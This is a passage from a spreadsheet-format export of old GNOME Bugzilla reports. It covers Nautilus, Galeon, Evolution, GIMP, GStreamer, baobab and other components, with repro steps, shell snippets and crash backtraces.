------- Additional Comments From pavel@eazel.com 2000-12-12 20:08:19 ----
Fixed part of it that involved deleting  trash on all volumes not just on the
home of home
------- Additional Comments From eli@eazel.com 2001-03-26 11:20:58 ----
SPAAAAAAAAAM! 
(Jon Allen has taken these components QA Assigning bugs to him.)
------- Additional Comments From pavel@eazel.com 2001-04-30 15:06:48 ----
This works fine.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:02 -------
The original reporter (pavel@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
The original owner (pavel@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GALEON-317396</t>
  </si>
  <si>
    <t>User interface</t>
  </si>
  <si>
    <t>Certificate Manager is pretty broken</t>
  </si>
  <si>
    <t>Please describe the problem:
It is possible to do name-based virtual hosting with SSL by using a certificate
extension called 'subjectAltName'. In every browser I have been able to test
tonight a certificate with a single CN and several subjectAltName's including
the one named in the CN can be used across multiple sites without generating
any warnings - ie it matches any hostname listed as a subjectAltName. In
Galeon such a certificate never matches any host name and therefore creates a
warning message stating that the web site could not be trusted.
Steps to reproduce:
1. Install the CACert root certificate from www.cacert.org
2. Visit a site using the feature such as https://host1.way1.vhosts.cacert.org/
   (I have another site that I don't wish to publish here but which I will 
   happily e-mail to any developer who is working on the problem.)
Actual results:
It was not possible to automatically trust . It is possible that
someone is intercepting your communication...
Expected results:
Worst case I'd expect the domain name listed in the CN to work. Ideally I'd
expect any domain name listed either in the CN or as a subjectAltName to work.
Does this happen every time?
yes
Other information:
When the CN matches one of the subjectAltNames it works in Firefox Konqueror
Opera Epiphany Mozilla Kazehakase and wait for it IE 6.</t>
  </si>
  <si>
    <t>acdingman</t>
  </si>
  <si>
    <t>EPIPHANY-335226</t>
  </si>
  <si>
    <t>[obsolete] Backend:Mozilla</t>
  </si>
  <si>
    <t>EPIPHANY</t>
  </si>
  <si>
    <t>Bug: opens wrong links when searching through pages</t>
  </si>
  <si>
    <t>That bug has been described on https://launchpad.net/distros/ubuntu/+source/epiphany-browser/+bug/34671
This is a rather annoying bug and it's rather difficult to explain. I guess it would be best shown through an example. Here's steps to reproduce this bug:
1) open up distrowatch.com
2) use ctrl-f and select different links and middle click them.
Unusual behavior: Many times when you middle click a link to open it in a new tab the page will scroll up and the wrong link will be opened. This bug is not only for distrowatch but many other pages.
I wish I could be more clear on why this is happening but I'm not sure. Can anyone else confirm this?</t>
  </si>
  <si>
    <t>epiphany-maint</t>
  </si>
  <si>
    <t>NAUTILUS-303491</t>
  </si>
  <si>
    <t>[obsolete] Builds</t>
  </si>
  <si>
    <t>build fails with gcc4 -Werror</t>
  </si>
  <si>
    <t>Steps to reproduce:
Stack trace:
Other information:
This is just pointer-signedness issues and a pedantic may be uninitialized issue.</t>
  </si>
  <si>
    <t>jamescape777</t>
  </si>
  <si>
    <t>NETWORKMANAGER-757307</t>
  </si>
  <si>
    <t>nmcli</t>
  </si>
  <si>
    <t>NETWORKMANAGER</t>
  </si>
  <si>
    <t>[review] nmcli: add command for displaying LLDP neighbors</t>
  </si>
  <si>
    <t>The list of LLDP neighbors is available through the D-Bus interface
and libnm already provides functions to retrieve it make the list
available through nmcli as well.</t>
  </si>
  <si>
    <t>networkmanager-maint</t>
  </si>
  <si>
    <t>bgalvani</t>
  </si>
  <si>
    <t>GNOME-PRINT-115756</t>
  </si>
  <si>
    <t>GNOME-PRINT</t>
  </si>
  <si>
    <t>margin adjustment not reflected in paper preview</t>
  </si>
  <si>
    <t>Using the libgnomeprintui interface adjusting the margins with the spin
buttons does not adjust the paper preview. (If you change the papersize
the changed margins are corectly shown.)</t>
  </si>
  <si>
    <t>chema</t>
  </si>
  <si>
    <t>EVOLUTION-241280</t>
  </si>
  <si>
    <t>Do Not Use</t>
  </si>
  <si>
    <t>gpilotd doesn't initiate hotsync</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:  The button on my PalmIIIc cradle is broken so I
use the onscreen HotSync button to initiate a hotsync.  When running in the
background the hotsync process never starts and my Palm winds up timing out.
Steps to reproduce the problem:
1. Place PalmIIIC into cradle
2. Turn on palm and go into hotsync screen
3. Press the onscreen hotsync button (not the physical button on the cradle)
Actual Results:  Palm device times out and reports error establishing a
connection with my computer.
Expected Results:  Hotsync process should begin.
How often does this happen? 
Additional Information:
To get the process to work:
1) Launch gtop system monitor.
2) Kill gpilotd
3) Open a terminal screen
4) Launch gpilotd DO NOT USE gpilotd &amp;
5) Keep terminal screen open and initiate the HotSync process as described
above
6) Hooray!  HotSync is carried out successfully.
System details:
RedHat 7.2 on i386 PentiumII 400MHz 384 MB RAM
evolution-1.2.4-0.ximian.1
gnome-pilot-0.1.71-0.ximian.1
pilot-link-0.11.5-4.ximian.1
PALMOS 4.1</t>
  </si>
  <si>
    <t>benyjr</t>
  </si>
  <si>
    <t>GLIBMM-390978</t>
  </si>
  <si>
    <t>Glib::Module does not report errors correctly</t>
  </si>
  <si>
    <t>When I use this code:
  std::string filename = Glib::Module::build_path(COMPONENT_DIR PREFIX + p_name)
  Glib::Module* module = new Glib::Module(filename)
  try
  {
    if (!module)
    {
      throw std::runtime_error(Glib::Module::get_last_error())
    }
  }
  catch(...) {...}
I get an empty error message while this.
  std::string filename = Glib::Module::build_path(COMPONENT_DIR PREFIX + 
    p_name)
  GModule* module = g_module_open(filename.c_str() (GModuleFlags)0)
  try
  {
    if (!module)
    {
      throw std::runtime_error(g_module_error())
    }
  }
  catch(...) {...}
works fine!</t>
  </si>
  <si>
    <t>jhs</t>
  </si>
  <si>
    <t>GNOME-CORE-93650</t>
  </si>
  <si>
    <t>Panel crashed after bootup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-core
Severity: normal
Version: 1.4.0.6
Synopsis: Panel crashed after bootup
Bugzilla-Product: gnome-core
Bugzilla-Component: panel
Description:
It crashed before showing the panel.
Debugging Information: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0x405ac409 in wait4 () from /lib/libc.so.6
#0  0x405ac409 in wait4 () from /lib/libc.so.6
#1  0x4062b98c in __check_rhosts_file () from /lib/libc.so.6
#2  0x4011eeb9 in gnome_icon_entry_get_type () from /usr/lib/libgnomeui.so.32
#3  0x4000c450 in _dl_runtime_resolve () at dl-runtime.c:204
#4  0x406295e0 in __morecore () from /lib/libc.so.6
#5  0x00000041 in ?? ()
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-09-19 08:42 -------
The original reporter (bholade@yahoo.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>bholade</t>
  </si>
  <si>
    <t>EVOLUTION-220659</t>
  </si>
  <si>
    <t>HTML Mail???</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.2
Synopsis: HTML Mail???
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I have html mail set to:  Load images off the net.
The problem is that our company has recently moved to a proxy firewall.  Before when we could go directly to port 80 to the internet all the html stuff worked.  Now behind the Proxy they do not.  There doesn't seem to be any configuration options for configuring evolution for being behind a firewall.
Is that a future enhancement or am I missing something simple???
John
Unknown reporter: jkimb@kimberlyconsulting.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>jkimb</t>
  </si>
  <si>
    <t>GNOME-VFS-322348</t>
  </si>
  <si>
    <t>Monitoring (inotify)</t>
  </si>
  <si>
    <t>GNOME-VFS</t>
  </si>
  <si>
    <t>inotify backend doesn't monitor a symlink to a directory</t>
  </si>
  <si>
    <t>If you have a symlink to a directory and monitor that as a directory you don't
get any changes reported when files are created in the directory.</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-500316</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER</t>
  </si>
  <si>
    <t>[Manual] Many GConf keys out of date as the schema has been heavily modified.</t>
  </si>
  <si>
    <t>Documentation 
Section: 
Lots of the GConf keys are out of date or have been removed so they need to be updated.
Correct version:
3.1: GConf preference no longer exists as far as I can tell.
3.2: Key is now /apps/gnome-power-manager/notify/fully_charged
3.3: Key now exists /apps/gnome-power-manager/notify/low_power
3.5: Key now exists /apps/gnome-power-manager/notify/sleep_failed
5.2: /apps/gnome-power-manager/cpufreq_consider_nice is now apps/gnome-power-manager/cpufreq/consider_nice
6.1: /apps/gnome-power-manager/laptop_panel_dim_brightness is now /apps/gnome-power-manager/backlight/idle_brightness
6.2: Keys are now in order: 
/apps/gnome-power-manager/lock/use_screensaver_settings
/apps/gnome-power-manager/lock/blank_screen
/apps/gnome-power-manager/lock/suspend
/apps/gnome-power-manager/lock/hibernate
8.3: Keys are now in order:
/apps/gnome-power-manager/dpms_method_ac
/apps/gnome-power-manager/dpms_method_battery
8.5: Key is now /apps/gnome-power-manager/general/use_time_for_policy
Other information:</t>
  </si>
  <si>
    <t>gnome-power-manager-maint</t>
  </si>
  <si>
    <t>patrick.hulin</t>
  </si>
  <si>
    <t>EVOLUTION-271429</t>
  </si>
  <si>
    <t>on NLD menus in wrong order</t>
  </si>
  <si>
    <t>Attaching shot. On snap from today on NLD menu pulldowns are wrong.
Actions is on the far left to the left of File.</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-460511</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR</t>
  </si>
  <si>
    <t>string translation issues</t>
  </si>
  <si>
    <t>salut benoÃ®t
i tried to update the translation of system-monitor and had some problems.
system-monitor includes some terms that are specific and require some technical knowledge that translators do not necessarily have. on the other hand we want a correctly localized user interface...
#: ../src/e_date.c:154
msgid ?
should this really be marked for translation?
#: ../src/gnome-system-monitor.schemas.in.h:2
msgid Column zero saved width
a column zero exists? how can i get that displayed in the UI?
#: ../src/gnome-system-monitor.schemas.in.h:7
msgid Default graph net in color
#: ../src/gnome-system-monitor.schemas.in.h:8
msgid Default graph net out color
please add a translator comment that net in means incoming network traffic (same with net out) otherwise only few creative folks will understand what this is about. http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments
Show process * on startup
Width of process * column
these would be much easier to read and understand if you put the name of the column in ''
#: ../src/interface.cpp:47
msgid _Monitor
verb or noun? http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments
#: ../src/interface.cpp:371 ../src/interface.cpp:431
msgid of
of what? this can mean several words in other languages depending on the context.
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments
#: ../src/load-graph.cpp:440 ../src/load-graph.cpp:450
msgid %s/s
what's that and how to translate? http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments
#: ../src/memmaps.cpp
Private clean Private dirty Shared clean Shared dirty
very technical terms i found out the meaning after several minutes of googling:
PC = Private-Clean one copy consistent with memory
PD = Private-Dirty one copy not consistent with memory
SC = Shared-Clean more copies possibly not consistent with memory
SD = Shared-Dirty more copies not consistent with memory
every translator should decide on his own whether these terms should be translated or kept in english i guess. translator comments for each term would make it at least a bit easier to understand the meaning of the terms and to decide whether to translate at all or not.
#: ../src/procdialogs.cpp:215
msgid _Nice value:
#: ../src/proctable.cpp:282
msgid Nice
Nice probably refers to the process priority? i'm afraid that some people translated this literally.
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments
#: ../src/sysinfo.cpp:400
msgid Release %s
noun or verb? most probably noun followed by something like 2.19.6 i guess? a translator comment would be good
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments</t>
  </si>
  <si>
    <t>system-monitor-maint</t>
  </si>
  <si>
    <t>EVOLUTION-246280</t>
  </si>
  <si>
    <t>inproper windows z-order</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
windows are shown in a weird z-order.
Steps to reproduce the problem:
1. choose tools-&gt;pilot settings...
2. 2 dialogs will pop up
3. try to close them
Actual Results:
please refer to attached screen snapshot.
you can't close window 2 before window 1 and window 3 will pop up just
under window 2. so you have to move window 3 to find the ok button to press.
Expected Results:
z-order should be: window 3 -&gt; window 2 -&gt; window 1.
How often does this happen? 
every time
Additional Information:</t>
  </si>
  <si>
    <t>calvin.liu</t>
  </si>
  <si>
    <t>GSTREAMER-151122</t>
  </si>
  <si>
    <t>playing a m4a-file using spider doesn't work</t>
  </si>
  <si>
    <t>Hi 
after talking to markey and BBB on #gstreamer we figured the following: 
this command works for my m4a-files: 
gst-launch filesrc location=file.m4a ! qtdemux ! faad ! audioconvert ! 
audioscale ! osssink 
but this doesn't work. 
gst-launch filesrc location=file.m4a ! spider ! audioconvert ! audioscale ! 
osssink 
Amarok uses spider so for now amarok can't play m4a-files. 
I'll attach a m4a-file so you can test it. 
Thanks! 
Martin</t>
  </si>
  <si>
    <t>GIMP-152746</t>
  </si>
  <si>
    <t>Missing include in linux-input controller</t>
  </si>
  <si>
    <t>I needed to add linux/types.h to modules/controller_linux_input.c. Otherwise
__u16 was unknown.</t>
  </si>
  <si>
    <t>GTK+-321444</t>
  </si>
  <si>
    <t>Widget: Other</t>
  </si>
  <si>
    <t>Immediately update GtkImage's animation frames.</t>
  </si>
  <si>
    <t>One if the few use cases for using animations is to indicate
busyness of some sort. However if the busyness is caused by
an idle function GtkImage's animation will stop being animated
if the idle/timeout function has a priority of less than
GDK_PRIORITY_REDRAW.
Attached patch adds gdk_window_process_updates() to
gtkimage.c(animation_timeout) which makes the animation
work unless the busy idle/timeout function is &gt; G_PRIORITY_DEFAULT.</t>
  </si>
  <si>
    <t>mitch</t>
  </si>
  <si>
    <t>GTKMM-157894</t>
  </si>
  <si>
    <t>GTKMM</t>
  </si>
  <si>
    <t>Gdk::Pixbuf::create_from_file() has no size arguments</t>
  </si>
  <si>
    <t>In the Gtk the function:
GdkPixbuf * gdk_pixbuf_new_from_file_at_size()
takes arguments for height and width size for scaling.  The scaling and size
methods and arguments do not currently exist in gtkmm 2.4</t>
  </si>
  <si>
    <t>rob.benton</t>
  </si>
  <si>
    <t>EVOLUTION-235844</t>
  </si>
  <si>
    <t>Incoming message-count does not remain visible</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.2.1
Synopsis: Incoming message-count does not remain visible
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Description of Problem:
A message count is displayed briefly as incoming mail is downloaded
then disappears. Other mail programs leave it showing which provides
helpful information.
Steps to reproduce the problem:
1. Download incoming mail.
2. Look for the message count.
3. 
Actual Results:
This data disappears prematurely.
Expected Results:
Leave that information where the user can read it without rushing
(especially important when on a fast connection!).
How often does this happen?
Always
Additional Information:
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>TheMillers</t>
  </si>
  <si>
    <t>EVOLUTION-219118</t>
  </si>
  <si>
    <t>Strange selection behavior for top-level items in Folders pane</t>
  </si>
  <si>
    <t>Description of Problem:
When clicking on one of the top-level folders in the Folders pane the item
clicked gains selection for a moment and then loses it.  It seems like it
would be less confusing if either nothing at all happened (the selection
stays where it is) or clicking on these nodes expanded/collapsed them.
Steps to reproduce the problem:
1. Click on one of the top-level folders in the Folders pane
Actual Results:
Item clicked gains selection for a moment and then loses it
Expected Results:
1) Nothing at all happened (the selection stays where it is) 
 -or-
2) Node expands/collapses</t>
  </si>
  <si>
    <t>erik.pukinskis</t>
  </si>
  <si>
    <t>GIMP-128199</t>
  </si>
  <si>
    <t>critical warnings in batch mode</t>
  </si>
  <si>
    <t>I looked and looked for a duplicate of this bug and couldn't find it. 
I am trying to make batch process script to convert layered .psd files in a directory to 
layered gimp .xcf files. So far it does work. But I get these annoying messages and 
have to CTRL+C to get it to process the next file in the que. If however when done I 
load an .xcf file it loads in fine. 
The Error Messages (during a typical run in a directory full of .psd files): 
$ ../savetogimp 
Working on file: file01.psd 
This is a development version of The GIMP. 
Debug messages may appear here. 
gimp_composite: use=yes verbose=no +mmx -sse -sse2 -3dnow -altivec -vis 
GIMP: Trying legacy loader on file '/home/editeduser/.gimp-1.3/palettes/CoralReef' with 
unknown extension. 
GIMP: Trying legacy loader on file '/home/editeduser/.gimp-1.3/palettes/Dream' with 
unknown extension. 
GIMP: Trying legacy loader on file '/home/editeduser/.gimp-1.3/palettes/Mac_System' 
with unknown extension. 
GIMP: Trying legacy loader on file 
'/home/editeduser/.gimp-1.3/palettes/Pantone_Coated_Approx' with unknown extension. 
GIMP: Trying legacy loader on file '/home/editeduser/.gimp-1.3/palettes/VisiBone' with 
unknown extension. 
GIMP: Trying legacy loader on file '/home/editeduser/.gimp-1.3/palettes/VisiBone2' with 
unknown extension. 
GIMP: Trying legacy loader on file '/home/editeduser/.gimp-1.3/palettes/WaterColorSet' 
with unknown extension. 
PSD: Stern warning - no mask info. 
batch command: executed successfully. 
(gimp-1.3:5032): Gtk-CRITICAL **: file gtkmain.c: line 1151 (gtk_main_quit): assertion 
`main_loops != NULL' failed 
The Script savetogimp: 
#!/bin/bash 
for file in * do 
  echo Working on file: $file 
  newfile=$(echo $file | sed s/.psd/.xcf/g)    
  gimp-1.3 --no-data --debug-handlers -c -i -b '(script-fu-psdgimp '$file' '$newfile')'  
'(gimp-quit 0)' 
done 
NOTE: The gimp line including '(gimp-quite 0)' is actually all on one line. 
The psdgimp.scm file which I saved to ~/.gimp-1.3/scripts: 
(script-fu-register script-fu-psdgimp 
/Xtns/Script-Fu/Tools/PSD to Gimp 
PSDGimp - Converts a layered PSD file to a layered Gimp .xcf file 
TechChiq 
TechChiq 
11-29-2003 
SF-FILENAME Infile infile.pcd 
SF-FILENAME Outfile outfile.xcf) 
(define (script-fu-psdgimp infile outfile) 
  (let*  
    ( 
      (img (car (file-psd-load 1 infile infile))) 
      (drawable (car (gimp-image-active-drawable img))) 
    ) 
    (gimp-file-save 1 img drawable outfile outfile) 
  ) 
) 
I'm using GTK+ 2.2.4 and Gimp 1.3.23 from an RPM. If you look at the output you'll see 
something about: 
  gimp_composite: use=yes verbose=no +mmx -sse -sse2 -3dnow -altivec -vis 
However there's no information on this in the command line help: 
$ gimp-1.3 --help 
GIMP version 1.3.23 
Usage: gimp-1.3 [option ... ] [file ... ] 
Options: 
  -h --help               Output this help. 
  -v --version            Output version information. 
  --verbose                Show startup messages. 
  --no-shm                 Do not use shared memory between GIMP and plugins. 
  --no-mmx                 Do not use MMX routines. 
  -d --no-data            Do not load brushes gradients palettes patterns. 
  -f --no-fonts           Do not load any fonts. 
  -i --no-interface       Run without a user interface. 
  --display       Use the designated X display. 
  -s --no-splash          Do not show the startup window. 
  -S --no-splash-image    Do not add an image to the startup window. 
  --session          Use an alternate sessionrc file. 
  -g --gimprc     Use an alternate gimprc file. 
  --system-gimprc  Use an alternate system gimprc file. 
  --dump-gimprc            Output a gimprc file with default settings. 
  -c --console-messages   Display warnings to console instead of a dialog box. 
  --debug-handlers         Enable non-fatal debugging signal handlers. 
  --enable-stack-trace  
                           Debugging mode for fatal signals. 
  -b --batch    Process commands in batch mode. 
I've used the --no-data in the command line (and even tried the shorthand -d) but both 
give the same results. I am assuming that it's trying to load in some palettes? Or is it 
trying to *use* palettes? I couldn't use --display 1:0 for example because then for each 
file it would print a dump of the help info. 
Pressing CTRL+C after each Gtk-CRITICAL message will process the next file. The 
resulting .xcf files do load in fine in Gimp.</t>
  </si>
  <si>
    <t>techchiq</t>
  </si>
  <si>
    <t>NAUTILUS-67734</t>
  </si>
  <si>
    <t>[obsolete] Backgrounds Emblems and Themes</t>
  </si>
  <si>
    <t>can no longer add an emblem to the Home icon (could do it in 1.0.4)</t>
  </si>
  <si>
    <t>nautilus-1.0.6-2.i386.rpm from Havoc's gnomehide(updated on Dec 29 2001)
Can not change the Home icon's emblem while the start here icon is OK.
Here is the meta file:
The file's `ls -l` reads:
-rw-rw-r-- 1 david david 204 12TB 31 09:11 .nautilus-metafile.xml
david's Home contains 113513 items totalling 2.5 GB.
When I drage the home icon around the desktop the icon_position can be
changed properly.</t>
  </si>
  <si>
    <t>sandyfox</t>
  </si>
  <si>
    <t>GNOME-UTILS-394925</t>
  </si>
  <si>
    <t>baobab</t>
  </si>
  <si>
    <t>GNOME-UTILS</t>
  </si>
  <si>
    <t>crash in Disk Usage Analyzer: Analyze a folder (home f...</t>
  </si>
  <si>
    <t>Version: 2.16.2
What were you doing when the application crashed?
Analyze a folder (home folder in this case).
Right-click folder and select List all files in folder
The crash depends on which folder you are listing and it seems random but is at least reproduceable when listing .bcast
Distribution: Gentoo Base System version 1.12.6
Gnome Release: 2.16.2 2007-01-05 (Gentoo)
BugBuddy Version: 2.16.0
Memory status: size: 162971648 vsize: 162971648 resident: 26423296 share: 12255232 rss: 26423296 rss_rlim: -1
CPU usage: start_time: 1168402613 rtime: 1428 utime: 1224 stime: 204 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/baobab'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 47174963065952 (LWP 12475)]
0x00002ae7c3cc295f in __libc_waitpid (pid=12566 stat_loc=0x7fffe8d88acc 
    options=0) at waitpid.c:41
	in waitpid.c
#0  0x00002ae7c3cc295f in __libc_waitpid (pid=12566 stat_loc=0x7fffe8d88acc 
    options=0) at waitpid.c:41
#1  0x00002ae7c1e8fdd0 in libgnomeui_segv_handle (signum=11)
    at gnome-ui-init.c:870
#2  
#3  g_value_object_collect_value (value=0x7fffe8d88fc0 n_collect_values=1 
    collect_values=0x7fffe8d88f80 collect_flags=0) at gobject.c:1947
#4  0x00002ae7c44904b8 in gtk_list_store_set_valist_internal (
    list_store=0x73ee00 iter=0x7fffe8d891d0 emit_signal=0x7fffe8d8902c 
    maybe_need_sort=0x7fffe8d89028 var_args=0x7fffe8d89050)
    at gtkliststore.c:742
#5  0x00002ae7c4491c2d in IA__gtk_list_store_set_valist (list_store=0x73ee00 
    iter=0x7fffe8d891d0 var_args=0x7fffe8d89050) at gtkliststore.c:792
#6  0x00002ae7c4491d18 in IA__gtk_list_store_set (list_store=0x7fffe8d88fc0 
    iter=0x1) at gtkliststore.c:831
#7  0x000000000040a98b in fill_search_model (bbret=0x7fffe8d89260)
    at baobab.c:314
#8  0x000000000040c149 in loopsearch (vfs_uri_dir=0x9715b0 
    search=0x4137fa *) at baobab-scan.c:182
#9  0x000000000040c1c4 in searchDir (uri_dir= 
    search=0x4137fa *) at baobab-scan.c:359
#10 0x000000000040aba7 in start_search (searchname=0x4137fa * 
    dir=0x94a660 /home/zero-one/.bcast) at baobab.c:207
#11 0x00002ae7c5d490b9 in IA__g_closure_invoke (closure=0x9e0cf0 
    return_value=0x0 n_param_values=1 param_values=0x7fffe8d895a0 
    invocation_hint=0x7fffe8d89470) at gclosure.c:490
#12 0x00002ae7c5d58731 in signal_emit_unlocked_R (node=0x57ec20 detail=0 
    instance=0x7e56e0 emission_return=0x0 
    instance_and_params=0x7fffe8d895a0) at gsignal.c:2440
#13 0x00002ae7c5d599e5 in IA__g_signal_emit_valist (instance=0x7e56e0 
    signal_id= detail=0 var_args=0x7fffe8d89820)
    at gsignal.c:2199
#14 0x00002ae7c5d59bc3 in IA__g_signal_emit (instance=0x7fffe8d88fc0 
    signal_id=1 detail=3906506624) at gsignal.c:2243
#15 0x00002ae7c459637a in IA__gtk_widget_activate (widget=0x7e56e0)
    at gtkwidget.c:3942
#16 0x00002ae7c44a5060 in IA__gtk_menu_shell_activate_item (
    menu_shell=0x5e3a10 menu_item=0x7e56e0 
    force_deactivate=) at gtkmenushell.c:1024
#17 0x00002ae7c44a6510 in gtk_menu_shell_button_release (widget=0x5e3a10 
    event=0x821920) at gtkmenushell.c:630
#18 0x00002ae7c44992fd in _gtk_marshal_BOOLEAN__BOXED (closure=0x5741a0 
    return_value=0x7fffe8d89b20 n_param_values= 
    param_values=0x7fffe8d89c10 invocation_hint= 
    marshal_data=0x2ae7c449e9d0) at gtkmarshalers.c:84
#19 0x00002ae7c5d490b9 in IA__g_closure_invoke (closure=0x5741a0 
    return_value=0x7fffe8d89b20 n_param_values=2 
    param_values=0x7fffe8d89c10 invocation_hint=0x7fffe8d89ae0)
    at gclosure.c:490
#20 0x00002ae7c5d588cf in signal_emit_unlocked_R (node=0x574210 detail=0 
    instance=0x5e3a10 emission_return=0x7fffe8d89e30 
    instance_and_params=0x7fffe8d89c10) at gsignal.c:2478
#21 0x00002ae7c5d597ae in IA__g_signal_emit_valist (instance=0x5e3a10 
    signal_id= detail=0 var_args=0x7fffe8d89e90)
    at gsignal.c:2209
#22 0x00002ae7c5d59bc3 in IA__g_signal_emit (instance=0x7fffe8d88fc0 
    signal_id=1 detail=3906506624) at gsignal.c:2243
#23 0x00002ae7c45926de in gtk_widget_event_internal (widget=0x5e3a10 
    event=0x821920) at gtkwidget.c:3911
#24 0x00002ae7c44929ce in IA__gtk_propagate_event (widget=0x5e3a10 
    event=0x821920) at gtkmain.c:2188
#25 0x00002ae7c4493a37 in IA__gtk_main_do_event (event=0x821920)
    at gtkmain.c:1422
#26 0x00002ae7c4829e9c in gdk_event_dispatch (source= 
    callback= user_data=)
    at gdkevents-x11.c:2320
#27 0x00002ae7c63ce183 in IA__g_main_context_dispatch (context=0x556ad0)
    at gmain.c:2045
#28 0x00002ae7c63d0fcd in g_main_context_iterate (context=0x556ad0 block=1 
    dispatch=1 self=) at gmain.c:2677
#29 0x00002ae7c63d12b6 in IA__g_main_loop_run (loop=0x7c1fe0) at gmain.c:2881
#30 0x00002ae7c4493d92 in IA__gtk_main () at gtkmain.c:1001
#31 0x000000000040b33f in main (argc= 
    argv=0x7fffe8d8a2b8) at baobab.c:894
Thread 1 (Thread 47174963065952 (LWP 12475)):
#0  0x00002ae7c3cc295f in __libc_waitpid (pid=12566 stat_loc=0x7fffe8d88acc 
    options=0) at waitpid.c:41
	oldtype = 0
	result = 
#1  0x00002ae7c1e8fdd0 in libgnomeui_segv_handle (signum=11)
    at gnome-ui-init.c:870
	estatus = 0
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {47174951801764 0 0 0 10239888 10239600 16226512 
      10239600 0 0 47174919207306 9317376 16226512 10239888 
      47174919207970 17149136}} sa_flags = 1 sa_restorer = 0xf798d0}
	pid = -512
	in_segv = 1
#2  
No symbol table info available.
#3  g_value_object_collect_value (value=0x7fffe8d88fc0 n_collect_values=1 
    collect_values=0x7fffe8d88f80 collect_flags=0) at gobject.c:1947
	object = 
#4  0x00002ae7c44904b8 in gtk_list_store_set_valist_internal (
    list_store=0x73ee00 iter=0x7fffe8d891d0 emit_signal=0x7fffe8d8902c 
    maybe_need_sort=0x7fffe8d89028 var_args=0x7fffe8d89050)
    at gtkliststore.c:742
	_cvalue = 
	_value_type = 5629568
	_vtable = (GTypeValueTable *) 0x51b3a8
	_collect_format = (gchar *) 0x51b3e8 p
	_cvalues = {{v_int = 4 v_long = 4 v_int64 = 4 
    v_double = 1.9762625833649862e-323 v_pointer = 0x4} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0}}
	_n_values = 1
	value = {g_type = 5629568 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0}}}
	error = 
	column = 0
	func = (
    GtkTreeIterCompareFunc) 0x2ae7c4556af0 
	__PRETTY_FUNCTION__ = gtk_list_store_set_valist_internal
#5  0x00002ae7c4491c2d in IA__gtk_list_store_set_valist (list_store=0x73ee00 
    iter=0x7fffe8d891d0 var_args=0x7fffe8d89050) at gtkliststore.c:792
	emit_signal = 1
	maybe_need_sort = 1
	__PRETTY_FUNCTION__ = IA__gtk_list_store_set_valist
#6  0x00002ae7c4491d18 in IA__gtk_list_store_set (list_store=0x7fffe8d88fc0 
    iter=0x1) at gtkliststore.c:831
	var_args = {{gp_offset = 48 fp_offset = 64 
    overflow_arg_area = 0x7fffe8d89168 reg_save_area = 0x7fffe8d89070}}
#7  0x000000000040a98b in fill_search_model (bbret=0x7fffe8d89260)
    at baobab.c:314
	iter = {stamp = 155084216 user_data = 0xf41d10 
  user_data2 = 0x10695e0 user_data3 = 0x2ae7c2b8280f}
	testo1 = (GString *) 0x7eb520
	picon = (GdkPixbuf *) 0x8e00f0
	gicon = 
#8  0x000000000040c149 in loopsearch (vfs_uri_dir=0x9715b0 
    search=0x4137fa *) at baobab-scan.c:182
	string_to_display = (
    gchar *) 0x100a3e0 /home/zero-one/.bcast/title_text.rc
	file_list = (GList *) 0x7f8060
	l = (GList *) 0x7d7740
	dir = 
	bbret = {size = 0 alloc_size = 0 
  fullpath = 0x100a3e0 /home/zero-one/.bcast/title_text.rc 
  lastacc = 1165046522 owner = 1000 mime_type = 0x9d2ea0 text/plain}
	result = 
	new_uri = (GnomeVFSURI *) 0x1069360
#9  0x000000000040c1c4 in searchDir (uri_dir= 
    search=0x4137fa *) at baobab-scan.c:359
	vfs_uri = (GnomeVFSURI *) 0x9715b0
